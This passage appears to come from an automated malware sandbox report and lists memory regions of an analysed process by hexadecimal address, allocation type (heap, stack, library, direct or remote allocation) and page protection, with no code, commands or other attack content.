page read and write
|
||
56AA000
|
heap
|
page read and write
|
||
7A30000
|
trusted library allocation
|
page read and write
|
||
54CE000
|
stack
|
page read and write
|
||
79F0000
|
heap
|
page read and write
|
||
7E5F000
|
stack
|
page read and write
|
||
6F0E000
|
stack
|
page read and write
|
||
5674000
|
heap
|
page read and write
|
||
732E000
|
stack
|
page read and write
|
||
7D20000
|
trusted library allocation
|
page read and write
|
||
5061000
|
trusted library allocation
|
page read and write
|
||
357D000
|
unkown
|
page read and write
|
||
2D6A000
|
heap
|
page read and write
|
||
8B29000
|
heap
|
page read and write
|
||
8B8E000
|
stack
|
page read and write
|
||
5831000
|
trusted library allocation
|
page read and write
|
||
3600000
|
trusted library allocation
|
page read and write
|
||
4594000
|
trusted library allocation
|
page read and write
|
||
2890000
|
heap
|
page read and write
|
||
6DDA000
|
trusted library allocation
|
page read and write
|
||
6E20000
|
direct allocation
|
page read and write
|
||
706D000
|
stack
|
page read and write
|
||
8AB0000
|
heap
|
page read and write
|
||
7DE0000
|
trusted library allocation
|
page execute and read and write
|
||
3350000
|
heap
|
page read and write
|
||
7E90000
|
trusted library allocation
|
page read and write
|
||
4C10000
|
heap
|
page read and write
|
||
4820000
|
heap
|
page execute and read and write
|
||
4F00000
|
heap
|
page execute and read and write
|
||
4B5F000
|
stack
|
page read and write
|
||
4F70000
|
heap
|
page readonly
|
||
7A5D000
|
heap
|
page read and write
|
||
86B0000
|
trusted library allocation
|
page execute and read and write
|
||
6DAF000
|
direct allocation
|
page read and write
|
||
77D0000
|
heap
|
page execute and read and write
|
||
298D000
|
heap
|
page read and write
|
||
4D32000
|
trusted library allocation
|
page read and write
|
||
532D000
|
trusted library allocation
|
page read and write
|
||
6DC0000
|
direct allocation
|
page read and write
|
||
7FB0000
|
trusted library allocation
|
page read and write
|
||
8B1B000
|
heap
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
4D77000
|
trusted library allocation
|
page read and write
|
||
10C000
|
stack
|
page read and write
|
||
8EB0000
|
trusted library allocation
|
page read and write
|
||
7747000
|
heap
|
page read and write
|
||
50A1000
|
direct allocation
|
page read and write
|
||
7440000
|
trusted library allocation
|
page read and write
|
||
4DE5000
|
trusted library allocation
|
page read and write
|
||
2978000
|
heap
|
page read and write
|
||
7867000
|
heap
|
page read and write
|
||
7816000
|
heap
|
page read and write
|
||
6089000
|
trusted library allocation
|
page read and write
|
||
A4E000
|
stack
|
page read and write
|
||
4FA0000
|
heap
|
page readonly
|
||
8C0E000
|
stack
|
page read and write
|
||
F07000
|
trusted library allocation
|
page execute and read and write
|
||
6BBF000
|
heap
|
page read and write
|
||
3BE000
|
unkown
|
page read and write
|
||
4D15000
|
trusted library allocation
|
page read and write
|
||
7AF0000
|
trusted library allocation
|
page execute and read and write
|
||
3448000
|
trusted library allocation
|
page read and write
|
||
4D23000
|
trusted library allocation
|
page read and write
|
||
8260000
|
trusted library allocation
|
page read and write
|
||
98CE000
|
stack
|
page read and write
|
||
5715000
|
trusted library allocation
|
page read and write
|
||
2D5E000
|
heap
|
page read and write
|
||
51CD000
|
trusted library allocation
|
page read and write
|
||
7060000
|
trusted library allocation
|
page read and write
|
||
4F6E000
|
stack
|
page read and write
|
||
4CF8000
|
trusted library allocation
|
page read and write
|
||
2C14000
|
heap
|
page read and write
|
||
7EF20000
|
trusted library allocation
|
page execute and read and write
|
||
516E000
|
stack
|
page read and write
|
||
4CF8000
|
trusted library allocation
|
page read and write
|
||
7C00000
|
trusted library allocation
|
page read and write
|
||
4BE0000
|
trusted library allocation
|
page execute and read and write
|
||
3356000
|
heap
|
page read and write
|
||
3400000
|
heap
|
page read and write
|
||
763F000
|
stack
|
page read and write
|
||
4EA9000
|
trusted library allocation
|
page read and write
|
||
7D10000
|
trusted library allocation
|
page read and write
|
||
89F0000
|
trusted library allocation
|
page read and write
|
||
B7D000
|
trusted library allocation
|
page execute and read and write
|
||
7C46000
|
heap
|
page read and write
|
||
7DE0000
|
trusted library allocation
|
page read and write
|
||
2D73000
|
heap
|
page read and write
|
||
787E000
|
stack
|
page read and write
|
||
7A62000
|
trusted library allocation
|
page read and write
|
||
2C13000
|
heap
|
page read and write
|
||
74A0000
|
heap
|
page execute and read and write
|
||
693F000
|
stack
|
page read and write
|
||
5929000
|
trusted library allocation
|
page read and write
|
||
4D54000
|
trusted library allocation
|
page read and write
|
||
367E000
|
stack
|
page read and write
|
||
569D000
|
heap
|
page read and write
|
||
7894000
|
heap
|
page read and write
|
||
C7A000
|
heap
|
page read and write
|
||
7130000
|
heap
|
page read and write
|
||
4CF3000
|
trusted library allocation
|
page read and write
|
||
77BD000
|
stack
|
page read and write
|
||
3690000
|
heap
|
page readonly
|
||
6C70000
|
trusted library allocation
|
page read and write
|
||
4BA0000
|
trusted library allocation
|
page read and write
|
||
5759000
|
trusted library allocation
|
page read and write
|
||
BD2000
|
heap
|
page read and write
|
||
8250000
|
trusted library allocation
|
page read and write
|
||
510E000
|
heap
|
page read and write
|
||
3365000
|
heap
|
page read and write
|
||
4CE9000
|
trusted library allocation
|
page read and write
|
||
4BA2000
|
trusted library allocation
|
page read and write
|
||
7B80000
|
trusted library allocation
|
page read and write
|
||
71F0000
|
trusted library allocation
|
page read and write
|
||
4FD000
|
stack
|
page read and write
|
||
6EFE000
|
stack
|
page read and write
|
||
400000
|
heap
|
page read and write
|
||
8C8E000
|
stack
|
page read and write
|
||
4C17000
|
heap
|
page read and write
|
||
87F0000
|
heap
|
page read and write
|
||
8DCE000
|
stack
|
page read and write
|
||
7C3A000
|
heap
|
page read and write
|
||
2780000
|
heap
|
page read and write
|
||
7876000
|
heap
|
page read and write
|
||
272E000
|
stack
|
page read and write
|
||
2C1E000
|
heap
|
page read and write
|
||
7820000
|
heap
|
page read and write
|
||
4CE0000
|
trusted library allocation
|
page read and write
|
||
25F9000
|
remote allocation
|
page readonly
|
||
8A0E000
|
stack
|
page read and write
|
||
8D4F000
|
stack
|
page read and write
|
||
25E7000
|
remote allocation
|
page execute and read and write
|
||
771E000
|
stack
|
page read and write
|
||
3280000
|
heap
|
page read and write
|
||
4766000
|
trusted library allocation
|
page read and write
|
||
459D000
|
trusted library allocation
|
page execute and read and write
|
||
2930000
|
trusted library allocation
|
page read and write
|
||
7D30000
|
trusted library allocation
|
page execute and read and write
|
||
8910000
|
trusted library allocation
|
page read and write
|
||
DA7000
|
heap
|
page read and write
|
||
8B0E000
|
stack
|
page read and write
|
||
4D03000
|
trusted library allocation
|
page read and write
|
||
2992000
|
heap
|
page read and write
|
||
7400000
|
heap
|
page read and write
|
||
A4F000
|
stack
|
page read and write
|
||
7200000
|
trusted library allocation
|
page read and write
|
||
815E000
|
stack
|
page read and write
|
||
5D3000
|
trusted library allocation
|
page execute and read and write
|
||
800000
|
heap
|
page read and write
|
||
8900000
|
trusted library allocation
|
page read and write
|
||
5619000
|
trusted library allocation
|
page read and write
|
||
E50000
|
heap
|
page read and write
|
||
795E000
|
stack
|
page read and write
|
||
36B7000
|
heap
|
page read and write
|
||
7837000
|
heap
|
page read and write
|
||
73DD000
|
stack
|
page read and write
|
||
3303000
|
trusted library allocation
|
page execute and read and write
|
||
44E7000
|
heap
|
page read and write
|
||
8CE0000
|
trusted library allocation
|
page read and write
|
||
4330000
|
remote allocation
|
page read and write
|
||
4BA5000
|
trusted library allocation
|
page execute and read and write
|
||
C3E000
|
stack
|
page read and write
|
||
732E000
|
stack
|
page read and write
|
||
780000
|
heap
|
page read and write
|
||
90F000
|
stack
|
page read and write
|
||
8DD0000
|
heap
|
page read and write
|
||
355D000
|
trusted library allocation
|
page execute and read and write
|
||
D60000
|
heap
|
page read and write
|
||
299D000
|
heap
|
page read and write
|
||
28F1000
|
heap
|
page read and write
|
||
34D6000
|
heap
|
page read and write
|
||
607A000
|
trusted library allocation
|
page read and write
|
||
7410000
|
trusted library allocation
|
page read and write
|
||
4CE9000
|
trusted library allocation
|
page read and write
|
||
3420000
|
heap
|
page read and write
|
||
8092000
|
heap
|
page read and write
|
||
36C7000
|
heap
|
page read and write
|
||
78DD000
|
heap
|
page read and write
|
||
4D02000
|
trusted library allocation
|
page read and write
|
||
950000
|
heap
|
page read and write
|
||
7D60000
|
trusted library allocation
|
page read and write
|
||
800000
|
trusted library allocation
|
page read and write
|
||
4F9F000
|
stack
|
page read and write
|
||
4D02000
|
trusted library allocation
|
page read and write
|
||
51B6000
|
trusted library allocation
|
page read and write
|
||
4D2E000
|
trusted library allocation
|
page read and write
|
||
2C10000
|
heap
|
page read and write
|
||
74AA000
|
stack
|
page read and write
|
||
7C10000
|
trusted library allocation
|
page read and write
|
||
7CF0000
|
trusted library allocation
|
page read and write
|
||
35E0000
|
heap
|
page read and write
|
||
77BE000
|
heap
|
page read and write
|
||
45CB000
|
trusted library allocation
|
page execute and read and write
|
||
35B0000
|
heap
|
page read and write
|
||
5000000
|
trusted library allocation
|
page read and write
|
||
6B7E000
|
stack
|
page read and write
|
||
3330000
|
heap
|
page read and write
|
||
4F80000
|
trusted library allocation
|
page read and write
|
||
7830000
|
heap
|
page read and write
|
||
2630000
|
heap
|
page read and write
|
||
4D14000
|
trusted library allocation
|
page read and write
|
||
5096000
|
direct allocation
|
page read and write
|
||
71E0000
|
trusted library allocation
|
page read and write
|
||
25A0000
|
remote allocation
|
page execute and read and write
|
||
47B0000
|
heap
|
page execute and read and write
|
||
2A21000
|
trusted library allocation
|
page read and write
|
||
8060000
|
heap
|
page read and write
|
||
58D7000
|
trusted library allocation
|
page read and write
|
||
299E000
|
heap
|
page read and write
|
||
844C000
|
stack
|
page read and write
|
||
790D000
|
heap
|
page read and write
|
||
708E000
|
stack
|
page read and write
|
||
7C67000
|
heap
|
page read and write
|
||
7B90000
|
trusted library allocation
|
page execute and read and write
|
||
4EA0000
|
trusted library allocation
|
page read and write
|
||
363D000
|
stack
|
page read and write
|
||
CAD000
|
stack
|
page read and write
|
||
A65000
|
heap
|
page read and write
|
||
6D82000
|
heap
|
page read and write
|
||
7E73000
|
trusted library allocation
|
page read and write
|
||
8E0D000
|
stack
|
page read and write
|
||
2D81000
|
heap
|
page read and write
|
||
7D8E000
|
stack
|
page read and write
|
||
4D53000
|
trusted library allocation
|
page read and write
|
||
3355000
|
heap
|
page read and write
|
||
6C2F000
|
heap
|
page read and write
|
||
7980000
|
trusted library allocation
|
page execute and read and write
|
||
7BF0000
|
trusted library allocation
|
page read and write
|
||
6AFD000
|
stack
|
page read and write
|
||
6DFE000
|
stack
|
page read and write
|
||
45B000
|
stack
|
page read and write
|
||
57E000
|
stack
|
page read and write
|
||
766C000
|
stack
|
page read and write
|
||
767D000
|
stack
|
page read and write
|
||
73AE000
|
stack
|
page read and write
|
||
4700000
|
trusted library allocation
|
page execute and read and write
|
||
4D4C000
|
trusted library allocation
|
page read and write
|
||
7F5E000
|
stack
|
page read and write
|
||
476E000
|
stack
|
page read and write
|
||
78A6000
|
heap
|
page read and write
|
||
4D00000
|
trusted library allocation
|
page read and write
|
||
72EE000
|
stack
|
page read and write
|
||
3555000
|
heap
|
page read and write
|
||
33F8000
|
heap
|
page read and write
|
||
7067000
|
heap
|
page read and write
|
||
752E000
|
stack
|
page read and write
|
||
36E8000
|
heap
|
page read and write
|
||
7C17000
|
heap
|
page read and write
|
||
8DE7000
|
heap
|
page read and write
|
||
7350000
|
trusted library allocation
|
page read and write
|
||
4D1E000
|
trusted library allocation
|
page read and write
|
||
83A0000
|
trusted library allocation
|
page read and write
|
||
809E000
|
stack
|
page read and write
|
||
789E000
|
stack
|
page read and write
|
||
5341000
|
trusted library allocation
|
page read and write
|
||
7BF0000
|
heap
|
page execute and read and write
|
||
6F4D000
|
stack
|
page read and write
|
||
8A4E000
|
stack
|
page read and write
|
||
78A3000
|
heap
|
page read and write
|
||
6C08000
|
heap
|
page read and write
|
||
8E7E000
|
stack
|
page read and write
|
||
87C0000
|
trusted library allocation
|
page read and write
|
||
47AE000
|
stack
|
page read and write
|
||
4E70000
|
heap
|
page execute and read and write
|
||
6F9BC000
|
unkown
|
page readonly
|
||
4EDE000
|
stack
|
page read and write
|
||
83B0000
|
trusted library allocation
|
page read and write
|
||
7042000
|
heap
|
page read and write
|
||
514E000
|
stack
|
page read and write
|
||
674E000
|
stack
|
page read and write
|
||
3562000
|
heap
|
page read and write
|
||
7AF4000
|
trusted library allocation
|
page read and write
|
||
5EAB000
|
trusted library allocation
|
page read and write
|
||
7B30000
|
trusted library allocation
|
page read and write
|
||
53C0000
|
trusted library allocation
|
page read and write
|
||
4B10000
|
trusted library allocation
|
page read and write
|
||
AE3000
|
trusted library allocation
|
page execute and read and write
|
||
2D98000
|
heap
|
page read and write
|
||
4912000
|
trusted library allocation
|
page read and write
|
||
8BEE000
|
stack
|
page read and write
|
||
52E5000
|
trusted library allocation
|
page read and write
|
||
7B20000
|
trusted library allocation
|
page read and write
|
||
7140000
|
trusted library allocation
|
page read and write
|
||
4BC0000
|
trusted library allocation
|
page read and write
|
||
D9C000
|
stack
|
page read and write
|
||
2A9F000
|
stack
|
page read and write
|
||
2986000
|
trusted library allocation
|
page read and write
|
||
6D3E000
|
stack
|
page read and write
|
||
4D17000
|
trusted library allocation
|
page read and write
|
||
745000
|
trusted library allocation
|
page execute and read and write
|
||
8385000
|
trusted library allocation
|
page read and write
|
||
4540000
|
trusted library allocation
|
page read and write
|
||
4FF9000
|
trusted library allocation
|
page read and write
|
||
70B9000
|
heap
|
page read and write
|
||
3349000
|
trusted library allocation
|
page read and write
|
||
67CD000
|
stack
|
page read and write
|
||
34CA000
|
heap
|
page read and write
|
||
4BC000
|
stack
|
page read and write
|
||
4CF3000
|
trusted library allocation
|
page read and write
|
||
C84000
|
heap
|
page read and write
|
||
805E000
|
stack
|
page read and write
|
||
6F40000
|
heap
|
page read and write
|
||
3463000
|
trusted library allocation
|
page execute and read and write
|
||
6FE2000
|
trusted library allocation
|
page read and write
|
||
2AF5000
|
heap
|
page read and write
|
||
8064000
|
heap
|
page read and write
|
||
86CD000
|
stack
|
page read and write
|
||
2785000
|
heap
|
page read and write
|
||
70EF000
|
heap
|
page read and write
|
||
4FDC000
|
stack
|
page read and write
|
||
332D000
|
trusted library allocation
|
page execute and read and write
|
||
57B8000
|
trusted library allocation
|
page read and write
|
||
50FE000
|
heap
|
page read and write
|
||
514F000
|
heap
|
page read and write
|
||
2FA0000
|
heap
|
page read and write
|
||
552E000
|
trusted library allocation
|
page read and write
|
||
7E40000
|
trusted library allocation
|
page read and write
|
||
8090000
|
direct allocation
|
page read and write
|
||
663000
|
heap
|
page read and write
|
||
4CF8000
|
trusted library allocation
|
page read and write
|
||
5258000
|
trusted library allocation
|
page read and write
|
||
8F5000
|
heap
|
page read and write
|
||
690E000
|
stack
|
page read and write
|
||
5181000
|
trusted library allocation
|
page read and write
|
||
4A1F000
|
stack
|
page read and write
|
||
73A0000
|
trusted library allocation
|
page execute and read and write
|
||
749B000
|
stack
|
page read and write
|
||
728D000
|
stack
|
page read and write
|
||
3577000
|
heap
|
page read and write
|
||
B30000
|
heap
|
page read and write
|
||
7450000
|
trusted library allocation
|
page read and write
|
||
7A7D000
|
heap
|
page read and write
|
||
749E000
|
stack
|
page read and write
|
||
5D6000
|
heap
|
page read and write
|
||
290B000
|
heap
|
page read and write
|
||
C3C000
|
stack
|
page read and write
|
||
7AE000
|
stack
|
page read and write
|
||
7DF0000
|
trusted library allocation
|
page read and write
|
||
9014000
|
trusted library allocation
|
page read and write
|
||
4FC0000
|
heap
|
page read and write
|
||
52ED000
|
stack
|
page read and write
|
||
75F000
|
heap
|
page read and write
|
||
B10000
|
trusted library allocation
|
page read and write
|
||
4CF8000
|
trusted library allocation
|
page read and write
|
||
34C2000
|
heap
|
page read and write
|
||
B3A000
|
heap
|
page read and write
|
||
298D000
|
heap
|
page read and write
|
||
4B60000
|
heap
|
page readonly
|
||
5360000
|
heap
|
page read and write
|
||
5596000
|
trusted library allocation
|
page read and write
|
||
4330000
|
remote allocation
|
page read and write
|
||
6061000
|
trusted library allocation
|
page read and write
|
||
2998000
|
heap
|
page read and write
|
||
8B4E000
|
heap
|
page read and write
|
||
7A26000
|
heap
|
page read and write
|
||
44E000
|
stack
|
page read and write
|
||
5C0000
|
heap
|
page read and write
|
||
2F90000
|
heap
|
page read and write
|
||
4FE0000
|
heap
|
page read and write
|
||
7E0000
|
trusted library allocation
|
page read and write
|
||
D24000
|
heap
|
page read and write
|
||
4CEB000
|
trusted library allocation
|
page read and write
|
||
B52000
|
heap
|
page read and write
|
||
3342000
|
trusted library allocation
|
page read and write
|
||
83A000
|
stack
|
page read and write
|
||
299D000
|
heap
|
page read and write
|
||
32FC000
|
heap
|
page read and write
|
||
4D14000
|
trusted library allocation
|
page read and write
|
||
510D000
|
heap
|
page read and write
|
||
7370000
|
trusted library allocation
|
page read and write
|
||
8E79000
|
trusted library allocation
|
page read and write
|
||
44C0000
|
trusted library allocation
|
page read and write
|
||
4CE7000
|
trusted library allocation
|
page read and write
|
||
4D36000
|
trusted library allocation
|
page read and write
|
||
2C35000
|
heap
|
page read and write
|
||
4CE1000
|
trusted library allocation
|
page read and write
|
||
7150000
|
trusted library allocation
|
page read and write
|
||
4D1C000
|
trusted library allocation
|
page read and write
|
||
7EA0000
|
trusted library allocation
|
page read and write
|
||
323C000
|
stack
|
page read and write
|
||
75ED000
|
stack
|
page read and write
|
||
4FD0000
|
trusted library allocation
|
page read and write
|
||
4CFA000
|
trusted library allocation
|
page read and write
|
||
53C4000
|
trusted library allocation
|
page read and write
|
||
8D0E000
|
stack
|
page read and write
|
||
1C0000
|
heap
|
page read and write
|
||
7430000
|
trusted library allocation
|
page read and write
|
||
32C8000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
78DB000
|
stack
|
page read and write
|
||
7B10000
|
trusted library allocation
|
page read and write
|
||
7180000
|
trusted library allocation
|
page read and write
|
||
43BE000
|
stack
|
page read and write
|
||
7CBE000
|
stack
|
page read and write
|
||
486E000
|
stack
|
page read and write
|
||
6F90000
|
trusted library allocation
|
page read and write
|
||
4E3B000
|
trusted library allocation
|
page execute and read and write
|
||
822000
|
trusted library allocation
|
page read and write
|
||
6589000
|
trusted library allocation
|
page read and write
|
||
6B4D000
|
stack
|
page read and write
|
||
562E000
|
stack
|
page read and write
|
||
570C000
|
trusted library allocation
|
page read and write
|
||
898D000
|
stack
|
page read and write
|
||
299E000
|
heap
|
page read and write
|
||
4E90000
|
trusted library allocation
|
page read and write
|
||
7930000
|
trusted library allocation
|
page read and write
|
||
745C000
|
stack
|
page read and write
|
||
5DD000
|
trusted library allocation
|
page execute and read and write
|
||
79A1000
|
heap
|
page read and write
|
||
4C9E000
|
trusted library allocation
|
page read and write
|
||
6C70000
|
trusted library allocation
|
page read and write
|
||
94E000
|
stack
|
page read and write
|
||
7340000
|
trusted library allocation
|
page read and write
|
||
8B20000
|
heap
|
page read and write
|
||
4D20000
|
trusted library allocation
|
page read and write
|
||
6C3A000
|
stack
|
page read and write
|
||
5AA1000
|
trusted library allocation
|
page read and write
|
||
5010000
|
trusted library allocation
|
page read and write
|
||
D90000
|
trusted library allocation
|
page read and write
|
||
3500000
|
heap
|
page read and write
|
||
C20000
|
heap
|
page read and write
|
||
513D000
|
heap
|
page read and write
|
||
8CCF000
|
stack
|
page read and write
|
||
4D3C000
|
trusted library allocation
|
page read and write
|
||
5641000
|
trusted library allocation
|
page read and write
|
||
71A0000
|
trusted library allocation
|
page read and write
|
||
1010000
|
heap
|
page read and write
|
||
5640000
|
heap
|
page read and write
|
||
4D06000
|
trusted library allocation
|
page read and write
|
||
4720000
|
heap
|
page execute and read and write
|
||
5069000
|
trusted library allocation
|
page read and write
|
||
1680000
|
heap
|
page read and write
|
||
7450000
|
heap
|
page execute and read and write
|
||
8C0A000
|
trusted library allocation
|
page read and write
|
||
4DEB000
|
trusted library allocation
|
page read and write
|
||
72DE000
|
stack
|
page read and write
|
||
88F0000
|
trusted library allocation
|
page read and write
|
||
8F0000
|
heap
|
page read and write
|
||
419E000
|
stack
|
page read and write
|
||
490B000
|
trusted library allocation
|
page read and write
|
||
7A71000
|
heap
|
page read and write
|
||
356A000
|
heap
|
page read and write
|
||
8070000
|
direct allocation
|
page read and write
|
||
2D5B000
|
heap
|
page read and write
|
||
3476000
|
trusted library allocation
|
page read and write
|
||
99E000
|
stack
|
page read and write
|
||
4D29000
|
trusted library allocation
|
page read and write
|
||
3277000
|
stack
|
page read and write
|
||
6A65000
|
heap
|
page execute and read and write
|
||
551F000
|
trusted library allocation
|
page read and write
|
||
69FA000
|
stack
|
page read and write
|
||
3A21000
|
trusted library allocation
|
page read and write
|
||
5438000
|
stack
|
page read and write
|
||
AB4000
|
trusted library allocation
|
page read and write
|
||
7872000
|
heap
|
page read and write
|
||
741E000
|
stack
|
page read and write
|
||
7BCD000
|
heap
|
page read and write
|
||
2AF0000
|
heap
|
page read and write
|
||
7046000
|
heap
|
page read and write
|
||
6C5E000
|
heap
|
page read and write
|
||
4FC0000
|
heap
|
page read and write
|
||
756E000
|
stack
|
page read and write
|
||
7A8E000
|
heap
|
page read and write
|
||
6B0000
|
heap
|
page read and write
|
||
75EE000
|
stack
|
page read and write
|
||
4D15000
|
trusted library allocation
|
page read and write
|
||
667000
|
heap
|
page read and write
|
||
256B000
|
stack
|
page read and write
|
||
3554000
|
trusted library allocation
|
page read and write
|
||
4F75000
|
heap
|
page read and write
|
||
2BEA000
|
heap
|
page read and write
|
||
762D000
|
stack
|
page read and write
|
||
2978000
|
heap
|
page read and write
|
||
4EB4000
|
trusted library allocation
|
page read and write
|
||
4D08000
|
trusted library allocation
|
page read and write
|
||
299D000
|
heap
|
page read and write
|
||
D1D000
|
heap
|
page read and write
|
||
8790000
|
heap
|
page read and write
|
||
88F0000
|
trusted library allocation
|
page read and write
|
||
7DCE000
|
stack
|
page read and write
|
||
7E80000
|
trusted library allocation
|
page read and write
|
||
7DD0000
|
heap
|
page read and write
|
||
4CE1000
|
trusted library allocation
|
page read and write
|
||
7B0A000
|
trusted library allocation
|
page read and write
|
||
5710000
|
trusted library allocation
|
page read and write
|
||
578000
|
stack
|
page read and write
|
||
73F0000
|
trusted library allocation
|
page read and write
|
||
297B000
|
trusted library allocation
|
page read and write
|
||
3FF000
|
unkown
|
page read and write
|
||
4FD8000
|
trusted library allocation
|
page read and write
|
||
74B0000
|
heap
|
page read and write
|
||
4D44000
|
trusted library allocation
|
page read and write
|
||
7CA0000
|
trusted library allocation
|
page read and write
|
||
6A60000
|
heap
|
page execute and read and write
|
||
73C0000
|
heap
|
page read and write
|
||
34DE000
|
stack
|
page read and write
|
||
4CE8000
|
trusted library allocation
|
page read and write
|
||
4EA0000
|
heap
|
page read and write
|
||
4CF4000
|
trusted library allocation
|
page read and write
|
||
523C000
|
stack
|
page read and write
|
||
7130000
|
trusted library allocation
|
page read and write
|
||
752D000
|
stack
|
page read and write
|
||
4D03000
|
trusted library allocation
|
page read and write
|
||
58EE000
|
trusted library allocation
|
page read and write
|
||
6F32000
|
heap
|
page read and write
|
||
4D17000
|
trusted library allocation
|
page read and write
|
||
32EB000
|
heap
|
page read and write
|
||
323E000
|
stack
|
page read and write
|
||
6F9B2000
|
unkown
|
page execute read
|
||
6C70000
|
trusted library allocation
|
page read and write
|
||
71F2000
|
trusted library allocation
|
page read and write
|
||
7860000
|
heap
|
page execute and read and write
|
||
4B60000
|
heap
|
page read and write
|
There are 2453 hidden memdumps, click here to show them.